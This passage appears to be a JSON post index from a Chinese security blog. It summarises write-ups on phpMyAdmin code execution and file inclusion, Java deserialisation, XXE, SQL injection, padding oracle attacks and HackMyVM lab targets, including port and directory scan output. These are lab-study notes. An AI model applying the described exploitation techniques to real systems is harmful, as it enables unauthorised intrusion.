id=\"漏洞简介\"\u003e漏洞简介\u003c/h2\u003e\n\u003cp\u003ephpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。\u003c/p\u003e\n\u003cp\u003e在其查找并替换字符串功能中，将用户输入的信息拼接进preg_replace函数第一个参数中。\n在PHP5.4.7以前，preg_replace的第一个参数可以利用\\0进行截断，并将正则模式修改为e。众所周知，e模式的正则支持执行代码，此时将可构造一个任意代码执行漏洞。\u003c/p\u003e","tags":["sec"],"title":"phpMyAdmin-4.0.x—4.6.2_远程代码执行漏洞"},{"date":"2024-09-18","permalink":"https://l1uyun.one/posts/phpmyadmin-4.8.1%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/","summary":"\u003ch2 id=\"漏洞简介\"\u003e漏洞简介\u003c/h2\u003e\n\u003cp\u003ephpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑，通过二次编码即可绕过检查，造成远程文件包含漏洞。\u003c/p\u003e\n\u003cp\u003e这个漏洞刚刚打演练的时候用过,分析一下原理\u003c/p\u003e\n\u003ch2 id=\"影响版本\"\u003e影响版本\u003c/h2\u003e\n\u003cp\u003ephpmyadmin 4.8.0 \u0026amp; 4.8.1\u003c/p\u003e\n\u003ch2 id=\"前提条件\"\u003e前提条件\u003c/h2\u003e\n\u003cp\u003e能够进入后台,也就是要有数据库的凭据\u003c/p\u003e\n\u003ch2 id=\"前置知识\"\u003e前置知识\u003c/h2\u003e\n\u003ch3 id=\"php文件包含\"\u003ephp文件包含\u003c/h3\u003e\n\u003cp\u003e服务器执行PHP文件时，可以通过文件包含函数加载另一个文件中的PHP代码，并且当PHP来执行，这会为开发者节省大量的时间。\n文件包含相关函数\u003c/p\u003e","tags":["sec"],"title":"phpmyadmin-4.8.1远程文件包含"},{"date":"2024-08-25","permalink":"https://l1uyun.one/posts/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e之前打了一个linux域的靶机,在巨魔的wp站里看见了红日靶场系列,学习一下win域\u003c/p\u003e\n\u003ch1 id=\"红日靶场1-win域\"\u003e红日靶场1-win域\u003c/h1\u003e\n\u003ch2 id=\"环境搭建\"\u003e环境搭建\u003c/h2\u003e\n\u003cp\u003e下载完之后,解压,并在vmware中扫描虚拟机\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba1-win%e5%9f%9f_image_1.png\" alt=\"\" /\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e根据这个网络拓扑图,win7机器有两个网卡,是通外网的,win2003和win2008是在内网环境中\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba1-win%e5%9f%9f_image_2.png\" alt=\"\" /\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e先给win7添加一下网卡,这里我习惯使用桥接,所以另一个网卡是桥接模式\u003c/p\u003e","tags":["sec"],"title":"红日靶场1"},{"date":"2024-08-18","permalink":"https://l1uyun.one/posts/puff-pastry%E6%89%93%E9%9D%B6/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e在群里瞅见了这个靶机,没打过这种复杂环境的靶机,玩一下\u003c/p\u003e\n\u003ch1 id=\"puff-pastry打靶记录\"\u003ePuff-Pastry打靶记录\u003c/h1\u003e\n\u003ch2 id=\"搭建\"\u003e搭建\u003c/h2\u003e\n\u003cp\u003e使用docker搭建,然后本地能够访问到一个8080端口\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/Puff-Pastry%e6%89%93%e9%9d%b6%e8%ae%b0%e5%bd%95_image_1.png\" alt=\"|207\" /\u003e\u003cfigcaption\u003e|207\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n这里我最开始是使用的Windows docker,后面改成了使用虚拟机\u003c/p\u003e\n\u003ch2 id=\"shiro\"\u003eshiro\u003c/h2\u003e\n\u003ch3 id=\"探测\"\u003e探测\u003c/h3\u003e\n\u003cp\u003ejava后端\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/Puff-Pastry%e6%89%93%e9%9d%b6%e8%ae%b0%e5%bd%95_image_2.png\" alt=\"|522\" /\u003e\u003cfigcaption\u003e|522\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n进去只有一个登录框,在搭建过程中已经知道了第一台机器是shiro,选择记住密码,登录\u003c/p\u003e","tags":["sec"],"title":"Puff-Pastry打靶"},{"date":"2024-08-06","permalink":"https://l1uyun.one/posts/javasec-springboot%E6%A1%86%E6%9E%B6%E5%88%A9%E7%94%A8/","summary":"\u003ch1 id=\"springboot利用\"\u003espringboot利用\u003c/h1\u003e\n\u003ch1 id=\"前置知识\"\u003e前置知识\u003c/h1\u003e\n\u003ch2 id=\"springboot-actuator\"\u003eSpringBoot Actuator\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSpring Boot Actuator 1.x 版本默认内置路由的起始路径为 / ，2.x 版本则统一以 /actuator 为起始路径\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSpring Boot Actuator 默认的内置路由名字，如 /env 有时候也会被程序员修改，比如修改成 /appenv\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e一般来讲，暴露出 spring boot 应用的相关接口和传参信息并不能算是漏洞，但是以 “默认安全” 来讲，不暴露出这些信息更加安全。\u003c/p\u003e\n\u003cp\u003e对于攻击者来讲，一般会仔细审计暴露出的接口以增加对业务系统的了解，并会同时检查应用系统是否存在未授权访问、越权等其他业务类型漏洞。\u003c/p\u003e","tags":["sec"],"title":"springboot利用"},{"date":"2024-08-03","permalink":"https://l1uyun.one/posts/javasec-urldns%E9%93%BE/","summary":"\u003ch1 id=\"urldns链\"\u003eurldns链\u003c/h1\u003e\n\u003cp\u003eURLDNS 是ysoserial中⼀个利⽤链的名字，但准确来说，这个其实不能称作“利⽤链”。因为其参数不是⼀个可以“利⽤”的命令，⽽仅为⼀个URL，其能触发的结果也不是命令执⾏，⽽是⼀次DNS请求。\u003c/p\u003e\n\u003cp\u003e虽然这个“利⽤链”实际上是不能“利⽤”的，但因为其如下的优点，⾮常适合我们在检测反序列化漏洞时使⽤\u003c/p\u003e","tags":["sec"],"title":"javasec-urldns链"},{"date":"2024-08-01","permalink":"https://l1uyun.one/posts/javasec-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/","summary":"\u003ch1 id=\"反序列化\"\u003e反序列化\u003c/h1\u003e\n\u003cp\u003e序列化是将Java对象转换成字节流的过程。而反序列化是将字节流转换成Java对象的过程，\njava序列化的数据一般会以标记(ac ed 00 05)开头，base64编码的特征为rO0AB，\u003c/p\u003e\n\u003cp\u003eJAVA常见的序列化和反序列化的方法有JAVA 原生序列化和JSON 类（fastjson、jackson）序列化等。\u003c/p\u003e","tags":["sec"],"title":"javasec-反序列化"},{"date":"2024-07-26","permalink":"https://l1uyun.one/posts/javasec-xxe/","summary":"\u003ch1 id=\"xxe注入\"\u003exxe注入\u003c/h1\u003e\n\u003ch2 id=\"前置知识\"\u003e前置知识\u003c/h2\u003e\n\u003ch3 id=\"xml文档\"\u003eXML文档\u003c/h3\u003e\n\u003cp\u003e要了解XXE漏洞，那么先得了解一下有关XML的基础知识。\u003c/p\u003e\n\u003cp\u003eXML是一种非常流行的标记语言，在1990年代后期首次标准化，并被无数的软件项目所采用。它用于配置文件，文档格式（如OOXML，ODF，PDF，RSS，\u0026hellip;），图像格式（SVG，EXIF标题）和网络协议（WebDAV，CalDAV，XMLRPC，SOAP，XMPP，SAML， XACML，\u0026hellip;）\u003c/p\u003e","tags":["sec"],"title":"javasec-xxe"},{"date":"2024-07-23","permalink":"https://l1uyun.one/posts/javasec-sql%E6%B3%A8%E5%85%A5/","summary":"\u003ch1 id=\"javasec-sql注入\"\u003ejavasec-sql注入\u003c/h1\u003e\n\u003ch2 id=\"前置知识\"\u003e前置知识\u003c/h2\u003e\n\u003ch3 id=\"sql注入\"\u003esql注入\u003c/h3\u003e\n\u003cp\u003e没有对用户的输入进行处理(过滤,黑名单,SQL预编译),直接将输入拼接到了sql语句中,\u003c/p\u003e\n\u003cp\u003e导致执行了用户构造的恶意SQL语句\u003c/p\u003e\n\u003cp\u003eSQL注入的语法与使用的数据库相关,与语言无关\u003c/p\u003e\n\u003ch3 id=\"java数据库操作\"\u003ejava数据库操作\u003c/h3\u003e\n\u003ch4 id=\"jdbc\"\u003ejdbc\u003c/h4\u003e\n\u003cp\u003ejava database connection\u003c/p\u003e\n\u003cp\u003ejava提供的数据库驱动库,用于进行数据库连接,执行SQL语句\u003c/p\u003e\n\u003cp\u003eJDBC有两个方法执行SQL语句，分别是PrepareStatement和Statement。\u003c/p\u003e","tags":["sec"],"title":"javasec-sql注入"},{"date":"2024-07-16","permalink":"https://l1uyun.one/posts/oracle-padding-attack/","summary":"\u003cp\u003e在打tryhackme的New-York-Flankees房间的时候遇见了这个攻击方式,没见过,学习一下\u003c/p\u003e\n\u003ch2 id=\"前置知识\"\u003e前置知识\u003c/h2\u003e\n\u003ch3 id=\"块密码\"\u003e块密码\u003c/h3\u003e\n\u003cp\u003e在分组密码加密领域，数据一次加密一个块，不同算法的块长度各不相同。\u003c/p\u003e\n\u003cp\u003e当要加密的数据长度不是块长度的倍数时，就需要填充。\u003c/p\u003e\n\u003cp\u003e高级加密标准 (AES)\u003c/p\u003e\n\u003cp\u003e数据加密标准 (DES)\u003c/p\u003e\n\u003cp\u003e三重数据加密标准 (3DES)\u003c/p\u003e\n\u003cp\u003eBlowfish\u003c/p\u003e\n\u003cp\u003eTwofish\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/202407160948_oracle-padding-attack_image_1.png\" alt=\"\" /\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch3 id=\"填充方案\"\u003e填充方案\u003c/h3\u003e\n\u003cp\u003e如前所述，分组密码采用固定大小的块，当明文不是块大小的倍数时需要填充。存在多种填充技术，但在本次攻击中，我们的重点是 PKCS#7。\u003c/p\u003e","tags":["sec"],"title":"oracle-padding-attack"},{"date":"2024-06-15","permalink":"https://l1uyun.one/posts/hmv_airbind/","summary":"\u003ch2 id=\"端口扫描\"\u003e端口扫描\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-shell\" data-lang=\"shell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~ ➤ nmap -Pn -sT 192.168.124.210 -p-\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eStarting Nmap 7.94SVN \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003e https://nmap.org \u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e at 2024-06-14 23:47 EDT\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eNmap scan report \u003cspan style=\"color:#66d9ef\"\u003efor\u003c/span\u003e 192.168.124.210\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eHost is up \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003e0.0047s latency\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e.\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eNot shown: \u003cspan style=\"color:#ae81ff\"\u003e65533\u003c/span\u003e closed tcp ports \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003econn-refused\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ePORT   STATE    SERVICE\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e22/tcp filtered ssh\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e80/tcp open     http\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eNmap \u003cspan style=\"color:#66d9ef\"\u003edone\u003c/span\u003e: \u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e IP address \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e host up\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e scanned in 7.38 seconds\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e22端口是filtered\u0026hellip;没注意这个细节\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMV_airbind_image_1.png\" alt=\"HMV_airbind_image_1\" /\u003e\u003cfigcaption\u003eHMV_airbind_image_1\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"web_80\"\u003eweb_80\u003c/h2\u003e\n\u003ch3 id=\"目录扫描\"\u003e目录扫描\u003c/h3\u003e\n\u003cp\u003e扫目录扫出来,状态不太行,应该先判断一下优先查看哪些目录\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-shell\" data-lang=\"shell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/images               \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 301\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 319\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e--\u0026gt; http://192.168.124.210/images/\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e   \n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/.php                 \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 403\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 280\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/about.php            \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 302\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 0\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e--\u0026gt; login.php\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/login.php            \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 200\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 1924\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/logos.php            \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 200\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 1977\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/stats.php            \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 302\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 0\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e--\u0026gt; login.php\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/index.php            \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 302\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 0\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e--\u0026gt; login.php\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/.html                \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 403\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 280\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/screenshots          \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 301\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 324\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e--\u0026gt; http://192.168.124.210/screenshots/\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/scripts              \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 301\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 320\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e--\u0026gt; http://192.168.124.210/scripts/\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e  \n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/registration.php     \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 302\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 0\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e--\u0026gt; login.php\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/includes             \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 301\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 321\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e--\u0026gt; http://192.168.124.210/includes/\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/db                   \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 301\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 315\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e--\u0026gt; http://192.168.124.210/db/\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e       \n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/logout.php           \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 302\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 0\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e--\u0026gt; .\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/styles               \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 301\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 319\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e--\u0026gt; http://192.168.124.210/styles/\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e   \n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/settings.php         \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 302\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 0\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e--\u0026gt; login.php\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/auth.php             \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eStatus: 200\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSize: 0\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"db文件泄露\"\u003edb文件泄露\u003c/h3\u003e\n\u003cp\u003e在db目录下找到一个sqlite的转储文件,使用在线工具解析一下,发现user\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMV_airbind_image_2.png\" alt=\"HMV_airbind_image_2\" /\u003e\u003cfigcaption\u003eHMV_airbind_image_2\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e","tags":["sec"],"title":"HMV_airbind"},{"date":"2024-05-14","permalink":"https://l1uyun.one/posts/hmv_adria/","summary":"\u003ch2 id=\"靶机启动\"\u003e靶机启动\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-shell\" data-lang=\"shell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e68\u003c/span\u003e ◯  arp-scan -l\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eInterface: ens33, type: EN10MB, MAC: 00:0c:29:31:02:fd, IPv4: 192.168.244.101\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eStarting arp-scan 1.10.0 with \u003cspan style=\"color:#ae81ff\"\u003e256\u003c/span\u003e hosts \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003ehttps://github.com/royhills/arp-scan\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e192.168.244.99  f6:39:4a:3d:95:18       \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eUnknown: locally administered\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e192.168.244.102 08:00:27:22:48:cd       PCS Systemtechnik GmbH\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e192.168.244.190 ca:a7:78:4d:50:e1       \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eUnknown: locally administered\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e3\u003c/span\u003e packets received by filter, \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e packets dropped by kernel\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eEnding arp-scan 1.10.0: \u003cspan style=\"color:#ae81ff\"\u003e256\u003c/span\u003e hosts scanned in 2.273 seconds \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003e112.63 hosts/sec\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e. \u003cspan style=\"color:#ae81ff\"\u003e3\u003c/span\u003e responded\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"端口扫描\"\u003e端口扫描\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-shell\" data-lang=\"shell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026gt; nmap 192.168.244.102 -Pn -sT -p- --min-rate \u003cspan style=\"color:#ae81ff\"\u003e4000\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eStarting Nmap 7.94SVN \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003e https://nmap.org \u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e at 2024-05-16 20:50 EDT\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eNmap scan report \u003cspan style=\"color:#66d9ef\"\u003efor\u003c/span\u003e 192.168.244.102\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eHost is up \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003e0.046s latency\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e.\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eNot shown: \u003cspan style=\"color:#ae81ff\"\u003e65531\u003c/span\u003e closed tcp ports \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003econn-refused\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ePORT    STATE SERVICE\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e22/tcp  open  ssh\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e80/tcp  open  http\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e139/tcp open  netbios-ssn\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e445/tcp open  microsoft-ds\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e先简单看一下各个服务\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 